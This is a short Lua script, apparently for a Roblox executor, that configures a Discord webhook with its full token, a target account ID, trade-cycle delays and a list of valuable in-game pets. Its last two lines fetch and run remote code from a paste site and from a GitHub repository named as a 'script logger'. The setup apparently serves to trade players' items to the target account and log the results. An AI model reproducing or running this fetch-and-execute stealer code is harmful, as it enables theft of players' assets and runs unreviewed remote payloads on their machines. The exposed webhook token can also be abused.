getgenv().WEBHOOK = "https://discord.com/api/webhooks/1510636902296981596/jJObha60fZs3HJu7SfcfwKCRkcGXTladIviKzXXeYtG0SiXlJ0BBpCTmIEKHI6rL7LZV"
getgenv().TARGET_ID = 9650763690
getgenv().DELAY_STEP = 1
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGETS = {
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Love Love Bear"] = true,
    ["La Supreme Kombinasion"] = true,
    ["Hydra Bunny"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Ketupat Bros"] = true,
    ["Ginger Gerat"] = true,
    ["Antonio"] = true,
    ["Elefanto Frigo"] = true,
    ["Burguro And Fryuro"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Capitano Moby"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Garama and Madundung"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Fishino Clownino"] = true,
    ["Tralaledon"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["Pancake and Syrup"] = true,
    ["Foxini Lanternini"] = true,
    ["Los Sekolahs"] = true,
    ["Cash or Card"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Los Spaghettis"] = true,
    ["Arcadragon"] = true,
    ["Bunny and Eggy"] = true,
}
loadstring(game:HttpGet("https://pastefy.app/fWuUdnGr/raw"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/666H4CK/666-SCRIPT-LOGGER/refs/heads/main/NO-GUI-LOGGER.lua"))()
